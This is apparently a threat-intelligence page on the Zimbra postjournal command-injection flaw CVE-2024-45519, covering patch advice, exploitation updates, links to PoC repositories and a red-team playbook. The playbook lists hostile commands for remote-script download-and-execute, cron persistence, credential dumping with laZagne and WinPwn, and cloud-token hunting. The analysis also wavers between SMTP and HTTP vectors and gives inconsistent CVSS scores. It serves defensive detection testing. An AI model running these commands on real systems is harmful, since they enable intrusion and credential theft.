CVE-2024-45519
Overview
This vulnerability is a command injection flaw in the PostJournal service of Zimbra Collaboration Suite. It results from improper sanitization of SMTP input, allowing crafted SMTP messages to be processed without adequate validation. The affected component is the SMTP-based PostJournal service, which executes commands under the Zimbra user context.
Vulnerability Description
The postjournal service in Zimbra Collaboration (ZCS) before 8.8.15 Patch 46, 9 before 9.0.0 Patch 41, 10 before 10.0.9, and 10.1 before 10.1.1 sometimes allows unauthenticated users to execute commands.
Impact
An unauthenticated attacker can remotely execute arbitrary operating system commands on the affected server with the privileges of the Zimbra user. This allows unauthorized access to system resources, potential privilege escalation, and compromise of data confidentiality and integrity. No user interaction or prior authentication is required, enabling full system compromise and lateral movement within the network environment hosting the Zimbra Collaboration Suite.
Solution
Apply the security updates provided by Synacor in Zimbra Collaboration Suite versions 8.8.15 Patch 46, 9.0.0 Patch 41, 10.0.9, and 10.1.1 or later. Detailed patch instructions and advisory information are available at the official Zimbra Security Center (https://wiki.zimbra.com/wiki/Security_Center) and the Zimbra Releases security fixes page (https://wiki.zimbra.com/wiki/Zimbra_Releases/10.1.1#Security_Fixes). Follow vendor guidance to update affected installations promptly.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the postjournal service of Zimbra Collaboration Suite (ZCS) represents a critical security flaw that allows unauthenticated users to execute arbitrary commands on the server. This issue arises from improper validation of user input, which can be exploited to bypass authentication mechanisms. The flaw affects multiple versions of ZCS, including those prior to specific patch releases in the 8.8, 9.0, and 10.1 series. The severity of this vulnerability is underscored by its high CVSS score of 9.8, indicating a significant risk to systems utilizing this collaboration platform.
Attack vectors for this vulnerability are particularly concerning due to the ease with which an attacker can exploit it. An unauthenticated user could potentially send crafted requests to the postjournal service, leading to the execution of commands on the server. This could be achieved through various means, such as sending specially formatted HTTP requests or leveraging other network protocols supported by ZCS. The implications of such exploitation are severe, as attackers could gain control over the server, access sensitive data, modify configurations, or deploy malware, all without needing valid credentials.
The real-world impact of this vulnerability on businesses can be profound. Organizations relying on Zimbra for email and collaboration may face significant operational disruptions if their systems are compromised. The potential for data breaches is heightened, as attackers could exfiltrate sensitive information, leading to regulatory penalties and loss of customer trust. Furthermore, the financial implications of remediation efforts, including incident response, system recovery, and potential legal liabilities, could be substantial. The reputational damage resulting from a successful attack could also hinder future business opportunities.
To effectively detect and mitigate this vulnerability, organizations should prioritize immediate patching of affected ZCS versions to the latest secure releases. Regularly updating software is a fundamental practice in cybersecurity that can prevent exploitation of known vulnerabilities. Additionally, implementing robust network security measures, such as firewalls and intrusion detection systems, can help identify and block malicious traffic targeting the postjournal service. Organizations should also conduct thorough security assessments and penetration testing to uncover potential weaknesses in their configurations and practices.
In conclusion, the vulnerability in the postjournal service of Zimbra Collaboration Suite poses a serious threat to organizations that utilize this platform for their communication and collaboration needs. The ability for unauthenticated users to execute commands can lead to severe operational and reputational consequences. By adopting proactive security measures, including timely patching, network monitoring, and comprehensive security assessments, organizations can significantly reduce their risk exposure and safeguard their critical assets against potential exploitation.
The CVSS score for CVE-2024-45519 has been adjusted upward to a perfect 10.0, reflecting a refined consensus on the vulnerability’s criticality. This recalibration coincides with its recent inclusion in the Known Exploited Vulnerabilities (KEV) catalog, underscoring increased recognition of its exploitation potential within the security community. CSURFACE threat intelligence has detected a slight uptick in exploit activity, supported by the emergence of additional publicly available proof-of-concept exploits on prominent code-sharing platforms. Although ransomware usage remains unconfirmed, the elevated EPSS score and KEV listing suggest growing attractiveness of this vulnerability to threat actors. For defenders, this evolution signals an urgent need to reassess exposure and prioritize mitigation efforts, as the vulnerability’s exploitability and impact are now unequivocally rated at the highest severity. Consequently, the threat level has escalated from high to critical, warranting immediate attention in security operations and risk management frameworks.
Update 2 — June 09, 2026
Recent updates to CVE-2024-45519 include a downward revision of its CVSS score from a perfect 10.0 to 9.8, reflecting a refined understanding of the vulnerability’s exploitability and impact. This adjustment, while slight, aligns the severity rating with current exploit trends and technical nuances identified during ongoing analysis. Notably, the vulnerability has been formally added to the Known Exploited Vulnerabilities (KEV) catalog, underscoring its recognition as a credible and active threat within the cybersecurity community. Our telemetry indicates that the Exploit Prediction Scoring System (EPSS) score remains exceptionally high and stable, signaling sustained attacker interest and potential for exploitation despite no confirmed ransomware linkage at this time. Additionally, new proof-of-concept exploits have surfaced on prominent code-sharing platforms, enhancing adversaries’ capability to weaponize this flaw. For defenders, these developments elevate the urgency of monitoring and response efforts, as the vulnerability continues to present a critical risk with demonstrated exploit availability and growing operational awareness among threat actors. Consequently, the threat level remains at critical, with an emphasis on the vulnerability’s persistent attractiveness and the evolving exploit landscape that could facilitate broader compromise.
Update 3 — July 07, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2024-45519, reflected by a doubling in detection frequency across our telemetry. This surge coincides with the continued availability and refinement of multiple proof-of-concept exploits on widely accessed code repositories, which lowers the barrier for adversaries to operationalize this critical remote command execution vulnerability. Although the EPSS score remains near maximum and stable, the increased activity signals growing attacker confidence and potential expansion in exploitation campaigns. For defenders, this intensification underscores the heightened risk of compromise, particularly in environments where patching is delayed or incomplete. The threat level remains critical, with this recent uptick reinforcing the urgency for vigilant monitoring and rapid incident response to mitigate the amplified adversary focus on Zimbra Collaboration Suite’s postjournal service.
Affected Products (92)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Synacor | Zimbra Collaboration Suite | All |
cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | All |
cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:-:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p1:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p10:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p11:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p12:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p13:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p14:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p15:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p16:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p17:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p18:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p19:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p2:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p20:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p21:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p22:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p23:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p24:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (3)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Chocapikk/CVE-2024-45519
Zimbra - Remote Command Execution (CVE-2024-45519)
|
Chocapikk | 139 | 24 | 2024-10-05 | View |
|
p33d/CVE-2024-45519
|
p33d | 42 | 17 | 2024-09-28 | View |
|
sec13b/CVE-2024-45519
Zimbra CVE-2024-45519
|
sec13b | 0 | 0 | 2025-03-08 | View |
Threat Feed
8 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
52%
|
High | High | |
| CAPEC-6 | Argument Injection |
48%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
48%
|
Medium | High |
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (9)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-45519 |
| wiki.zimbra.com |
GitHub CVE
|
https://wiki.zimbra.com/wiki/Security_Center |
| wiki.zimbra.com |
GitHub CVE
|
https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy |
| wiki.zimbra.com |
GitHub CVE
|
https://wiki.zimbra.com/wiki/Zimbra_Releases/10.1.1#Security_Fixes |
| wiki.zimbra.com |
GitHub CVE
|
https://wiki.zimbra.com/wiki/Zimbra_Releases/10.0.9#Security_Fixes |
| wiki.zimbra.com |
GitHub CVE
|
https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P41#Security_Fixes |
| wiki.zimbra.com |
GitHub CVE
|
https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P46#Security_Fixes |
| blog.projectdiscovery.io |
NVD API
Exploit
|
https://blog.projectdiscovery.io/zimbra-remote-code-execution/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-45519 |